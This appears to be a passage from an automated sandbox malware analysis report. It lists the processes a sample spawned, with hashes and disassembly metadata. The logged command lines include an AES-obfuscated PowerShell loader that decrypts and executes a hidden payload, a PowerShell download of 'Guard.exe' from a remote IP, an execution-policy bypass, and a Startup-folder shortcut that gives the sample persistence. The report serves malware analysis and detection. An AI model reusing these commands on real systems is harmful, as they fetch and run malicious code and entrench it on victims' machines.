                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean('78219AD4FAFD1313B3312ABC82CE34A02A4A60C02EBEBF66EF22D1AE9E38EAB935975C5E265945ACF8F43EA3217D7E04446B93E8935F8A650373163DF23D9095D2EE36D9AE183830DA3383A93777009FFE992C94365431E85C9A4BD19706DE0F651039764F10D911FF62FC644C72D4568DEB22276F734D73AB4E6A18097DC3C4C7480CFE127D41CB49FF2295F7E03078C98E7DBADDD24DD3982D0786BCE84A387192B080A130BF4762AFEFC2CE03F92D6FBB6AEA0B223A2119ABFE11214C698E82BE06E8F9B342CD1C7F089050675451B7455B935BA443206FDCD04C4D942F4620687D61DCE7B4896DF4982AD1CAA4709913A3BFBA7868829327FE80430B6CFF032AFE6E144EA3B7EEEB9B1ED8A7D2EE845D26410B8D045FB1A5B3BF8A7AB9BB3E0D066452978BBC7F125835600824DDDC81D38A5209F1A4091DD7B7C1D04307CA0FB5F05575A79F927FE51C241234BD04F89918070EE2E5287BE446F1920BF8A252AD8998C544A249048AF75DB89D6D0B6A8AD543DEEB0889D275BCB8B92841DAD4290E2DC88D65C9630CC47CCD6F299BB0BED9C404CBD5A82ADE61B6393BD1C517406CEC6BBF66E379EEFE6CAB17ABC4FE3B95CD7AFF7FC1DDD9A920A6191FB37C8EC30A4A7667A113B678672013F0BABB0C4B9F43C87FC854B2E47772CACC37D2ADF2664824AF9C4DB947633D07DD47E03C0BD686B11FD76ABC45F1D4050F3E57080C852D506F56B49340243D2E73DD50FA076F63A84BC99C7519ADC821AC6311B2CEDD59508884AE75F53F4A78FF89CC03F899651C73F3989A11092A199BD1AA8DCCA27B2B7D39A6A8A8A1E91E34A26196775ACBEADB106D5F827D0A5A5B44D891E4B333CA7F6AFDC7725D5BD9CEC0B11138E8AB3AFBEEE6D44F83D151C14A67A3497E17312DF7AB7BD3DCB1D33AC9AA0402ED89756C4B881508E863BE482E8AEFB806649D738E7DCE2814888C8EE1E5F0C849829B3A00AA1A7EF6E1C6498222EC93BF8FED737DE9D7576AFAE854850BFF492E80199552DDEF0675B892B327717CB5AF4CFFBB1A5D7C623A2768AA32CC72FBCA150EC0786993E294FA0F154E9A90E9394DC84E513BB54ED63CDE8CDDBDAE0AC392E93E0A5AF01CFE86C53D9F595CED51532CB14F4D98D7FCD5EF8B286785CABB97B5793CDFDC9D05F90353B05939CAC7A6F8938A1073C7190ED1E372A484F1764DEAAC0CB173B868C0330983DCADEB563002EE18FDD0662F1117381739EC36C7AC7F333B3D0F9883A3875F9AD6194D6264748161A5E8FC943C8D9CC7F4F4CC6DFFC926B8CB32A52C8CE0BBCD0CC4E6128DEFB5ECED7F3A9786CB2F36C6B53B84C319FA011D47CD55D4FC3A8BFD9BBD84A9736B1122314172FB69B308F5380A65BD8E70E37A3C3660FAB16D1CA3609ED74F25793CB21D2C45B081D8E2F72DCDDBE269188B42541A2D5FE30CBDAE1EA3E31418FACA2F5448EECBFD69D9231F9C19ABC5BE36A8776A1319460EE488396DDC19905B1F4A80C52596B85B2B0BFA14FED4C0AEC8366A87710B144BAA0ECA013BF68B764FD59CF871FAE15AFAFE6A3E29CF3BEDEFDDF29675BB14D585BB959E86034C7525C3572536DCCFC109FA80925932BA43B5436E89F7BFE06F033C54CF7252EE9FF9C4C977EDE18AC548BD5F848B384D44C8DC955EF7A663E276183DB51D3513687F1D7D1B10B0B09043B0D2D9110AFA20C03738F1593BB49422FF1EDE5B067366BB176DAC56DF968F791A5FADF7F8C994C4EE8E99902C57B90344E31873504C3C9DA5D1A07DB9ECF1');$IiqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString($UdJKkrroG.TransformFinalBlock($KUtXL, 0,$KUtXL.Length)); & $mhREwMEES.Substring(0,3) $mhREwMEES.Substring(3)
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:15:06:02
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                  Start time:15:06:07
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                  Start time:15:06:08
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
                                                                                                                                                                                                                  Imagebase:0x7ff656cb0000
                                                                                                                                                                                                                  File size:1'083'904 bytes
                                                                                                                                                                                                                  MD5 hash:567DE19C0E7E3A1FC845E51AC1C1D5D8
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                  Start time:15:06:12
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                  Start time:15:06:13
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                  Start time:15:06:13
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                  Start time:15:06:15
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                  Start time:15:06:15
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                  File size:1'255'976 bytes
                                                                                                                                                                                                                  MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                  Start time:15:06:18
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                  Start time:15:06:18
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                  Start time:15:06:24
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\Public\Guard.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                                                  File size:893'608 bytes
                                                                                                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                  Start time:15:06:26
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                                                                                                                                                  Imagebase:0x1c0000
                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                  Start time:15:06:26
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                  Start time:15:06:40
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                                                                                                                                                  Imagebase:0x7ff72f7c0000
                                                                                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                  Start time:15:06:41
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                                                                                                                                                  Imagebase:0xae0000
                                                                                                                                                                                                                  File size:893'608 bytes
                                                                                                                                                                                                                  MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                  Start time:15:07:08
                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 0000022B3F43020B Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403647580.0000022B3F430000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F430000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f430000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0q9$0q9
                                                                                                                                                                                                                    • API String ID: 0-2358745892
                                                                                                                                                                                                                    • Opcode ID: 08208a7ce72d26685f6271ba10cd867a0a70df1009c1d4b1890173631d887759
                                                                                                                                                                                                                    • Instruction ID: 0845435ef9ed2ecb1fbc8b9d37f4ff0bafa089862283a3afd3ea5277813b6cd2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08208a7ce72d26685f6271ba10cd867a0a70df1009c1d4b1890173631d887759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511E16121DA880FFB5EDABC542C3283BD0EBA6355F4901EB9486CB2F7ED159CC08251
                                                                                                                                                                                                                    Function 0000022B3F240FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403690977.0000022B3F240000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F240000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f240000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction ID: 183c256e935d0953f7d96e4a9d444f75ac36638a1f6f81a7f4cddb29da42fa79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C9002048D9406A5D41591D11C4D25C5140B788250FD544D0985790194DD8D02D61192
                                                                                                                                                                                                                    Function 0000022B3F240FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403690977.0000022B3F240000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F240000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f240000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction ID: 183c256e935d0953f7d96e4a9d444f75ac36638a1f6f81a7f4cddb29da42fa79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C9002048D9406A5D41591D11C4D25C5140B788250FD544D0985790194DD8D02D61192
                                                                                                                                                                                                                    Function 0000022B3F240FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000004.00000003.2403690977.0000022B3F240000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000022B3F240000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_22b3f240000_mshta.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction ID: 183c256e935d0953f7d96e4a9d444f75ac36638a1f6f81a7f4cddb29da42fa79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C9002048D9406A5D41591D11C4D25C5140B788250FD544D0985790194DD8D02D61192

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00007FFD32CD420E Relevance: .8, Instructions: 850COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000008.00000002.2397768619.00007FFD32CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CD0000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7ffd32cd0000_powershell.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 304cb422f9a58b2e17e6bf9375c9727c39c488c6615e970536ae56f55e25cd10
                                                                                                                                                                                                                    • Instruction ID: 45c7c9bac72bc0b93bd91e5d66671ec803c46b780fcc01563d50068b5ea4bbe8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 304cb422f9a58b2e17e6bf9375c9727c39c488c6615e970536ae56f55e25cd10
